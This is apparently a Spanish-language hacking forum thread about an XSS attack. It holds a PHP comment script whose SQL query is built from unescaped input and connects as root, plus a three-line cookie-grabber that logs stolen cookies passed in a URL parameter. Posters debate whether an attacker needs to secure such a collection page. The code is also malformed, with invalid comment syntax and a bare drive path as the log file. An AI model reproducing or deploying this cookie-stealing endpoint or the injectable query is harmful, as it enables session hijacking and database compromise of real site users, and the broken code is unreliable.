ayuda con vulnerabilidad xss

[chewarrior]

<?

if (!$coment){

echo "no se a insertado nada orangutan";
exit;
}

$coment = addslashes($coment); \\ filtramos caracteres especiales

$db = mysql_pconnect("127.0.0.1", "root", "root"); \\ conectamos

if (!$db)
{
echo "Error: No se puede conectar a la base de datos. Por favor inténtalo de nuevo.";
exit;
}

mysql_select_db("datos"); \\ cojemos la base de datos

\\ query variable que guarda la peticion

$query = "insert into comentarios values ('".$indiceid."','".$nombre."' ,'".$mai."', '".$coment."')"; \\ comando sql int comentarios \\tabla. values \\ valores indice autoincrement \\ nombre \\ mail \\ comentario

$result = mysql_query($query); \\ peticion

if ($result==FALSE) {
echo "Te jodes fracasado";
}


?>

Es mucho mas dificil porque tienes que tener mas conocimientos no solo con saber php, si no que tambien deves de saber Crear bases de datos, y comandos sql (casi nada e)


En cambio solo tratando con archivos txt me parece mucho mas sencillo

$directorio="C:\"
$cookie = $_GET['cookie'];
$fp = fopen($directorio,"a"); \\ en 3 lineas
fwrite($fp,$cookie);
fclose($fp);

Y eso por no hablar de las race conditions y de lo lenta que se hace la navegación por un archivo cuando ya se ha alcanzado cierto número de líneas.

Ya pero estamos hablando de guardar una cookie, no vamos hacer una pagina web segura y rapida.

[Fruit]

Ya pero estamos hablando de guardar una cookie, no vamos hacer una pagina web segura y rapida.

¿Siendo atacante no quieres asegurar tu página? Me sé de uno de por aquí que tuvo una muy buena experiencia con algo similar. No daré nombres, él sabe de qué hablo